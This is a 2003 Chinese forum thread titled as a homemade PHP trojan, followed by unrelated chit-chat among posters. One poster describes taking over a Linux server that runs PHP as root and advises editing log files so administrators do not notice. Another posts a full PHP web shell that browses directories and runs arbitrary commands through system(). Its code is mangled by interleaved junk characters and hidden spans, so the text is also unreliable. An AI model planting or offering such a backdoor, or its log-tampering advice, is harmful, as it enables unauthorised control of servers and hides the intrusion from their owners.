我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 7 E% G2 ]0 Y. U9 j0 @1 Q) Z) Exx.php如下（太简陋了，不免高手门笑话，hoho） ' a% H8 _2 y3 Q0 b* k //获得指定文件的文本 function getfile($filename) { if (!$filename){ return false; 8 j q \( z: O# @ a# @; ~ } 8 z, B- [6 r8 G- @' S1 @ $fp = @fopen($filename,"r"); if (!$fp){ ) X' p: ]* ~/ U+ n return false; # }! t+ o) D* x! {- O } 8 K( F9 x. ^+ n- K4 m $fdata = @fread($fp,filesize($filename)); fclose($fp); return $fdata; # h5 e2 v" f3 y} . s4 R9 w L% m8 p3 K0 M& \$str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ 但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 ! N( r$ N% ?- |/ x' _6 `/* GNU */ /* 您可以任意传播，不过请一定写出作者名字 */ 8 h# X# c) n9 g, a/* 原作者： Martin Geisler 3 G2 l' s, c4 A8 f8 `1 p改写汉化： YZHLINUX , ?( A( e0 o j$ _1 A# N*/ # s2 Q+ b; c- h6 v# K5 J" J " P% p# A/ D. t5 f) h" m# z , j# j. g! J% B) K' W 9 v/ B4 [3 N1 x 9 @8 q6 P, c4 A/* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ if (isset($work_dir)) { , [( T1 z- A" h9 n6 ` /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ 2 E" e d, V% c$ c chdir($work_dir); $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 2 z8 b m }: s& ^2 X} else { /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 ! |/ _9 r( g, b; c4 F. f 注: $DOCUMENT_ROOT 是系统提供的*/ chdir($DOCUMENT_ROOT); $work_dir = $DOCUMENT_ROOT; 2 R! F9 {0 [8 C} . {) |" v, R; j6 N8 j" c9 u, Z?> , t* {) U5 `5 T7 ]$ L0 s/ H

当前工作目录: " \* }3 P3 o3 k- O* F3 U* O) d3 j/ e) x; S$ }4 a2 D+ Z" Y$ x$work_dir_splitted = explode("/", substr($work_dir, 1)); echo "Root/"; if ($work_dir_splitted[0] == "") { $work_dir = "/"; /* 根目录. */ } else { 7 Y% Y, u! T n3 k) g for ($i = 0; $i < count($work_dir_splitted); $i++) { * _' \' I. V" T5 { /* echo "i = $i";*/ $url .= "/".$work_dir_splitted[$i]; # a* r! E* x3 \& I' R3 w! w5 P* m echo "$work_dir_splitted[$i]/"; & C3 T3 D: C9 ?9 k5 q2 `5 j& a5 s } } / w0 x9 C/ k; {, s* p# a. j5 A?>

* t7 B3 X# H0 x

选择新的工作目录:

, \6 f" T# d4 R* v4 A% L2 ~( s. j) L- u( S/* 现在我们对这个目录坐一个文件列表 */ % ^, g, v! V2 u' P$dir_handle = opendir($work_dir); /* 来一个遍历找出所有的文件和目录 */ while ($dir = readdir($dir_handle)) { + Q* i9 U+ _/ @1 V+ E9 o8 i if (is_dir($dir)) { " z* Z+ J* d; Q& g, p: W4 X6 K if ($dir == ".") { echo "Current Directory\n"; } elseif ($dir == "..") { ; @5 {5 y5 u! k! S! L$ w8 D) I* m /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ if (strlen($work_dir) == 1) { /* 长度只有 1 ---- 那么只能是 '/' 了 */ } elseif (strrpos($work_dir, "/") == 0) { 4 H s7 A& z- G7 z- k& N# d3 M /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ * \, G3 s0 s z/ A- q echo "Parent Directory\n"; 6 U# l4 @1 I/ F+ F" T4 R ~, O } else { 0 ?, N8 ~' C5 U. e echo "Parent Directory\n"; `& k; U' q R/ H T" J } } else { : q) s+ I0 H) B if ($work_dir == "/") { 1 U6 u9 R& @3 \- n' t9 d7 _ echo "$dir\n"; } else { echo "$dir\n"; $ \6 j) _+ A& [. ^ } ( I' H) k. w+ _9 O } . o5 B) r8 D: f M; V* ]% U0 } } } closedir($dir_handle);//不要忘记关闭 ?> r% { z5 ?2 {# c

命令:

>

是否捕获错误信息?

Output:

6 [. S$ S' w- E" O. B0 r0 N; @<font class="jammer">9 w; W0 t# \0 z</font> <?php <span style="display:none">: Y0 T' _5 a8 s7 J3 g# o</span>if ($command) { <span style="display:none">; R# T/ o4 F0 S s# R6 C</span> if ($stderr) {<font class="jammer">- u7 c, I0 B) N, E* \3 ?</font> /* 这个命令组能看懂吗? <font class="jammer"> |$ v, u* a$ n9 w</font> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/<font class="jammer">6 Y5 T* F3 z* R8 R- m* Z# k</font> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); <span style="display:none">3 [* D6 P& [+ T- a6 e7 |</span> }else { <span style="display:none">% v0 r5 d- J; t9 L+ @. ^0 t+ Z</span> system($command);<font class="jammer">" ]3 e6 I1 ^5 O2 ~0 P# o9 Z+ l</font> } <span style="display:none">& l' i% m$ X( K. e</span>}<font class="jammer">8 C. _; x8 Y1 V, t4 b( a9 g</font> ?> <span style="display:none">1 H$ d* f1 B6 J2 g! N. v( J; M/ G! d8 @</span>

! O C/ C' t8 k* k, q0 @" [

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

% z. M' i4 v4 [' r

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
9 W$ C/ V( ^% C# J  s$ r5 u语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（
& C) x/ {2 z' O- O: ~' o. Y

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
6 A4 f7 T3 `! `! a我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（

我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！
0 r  o- D$ n* L3 _$ M

yzhlounx 你是工程的吧  呵呵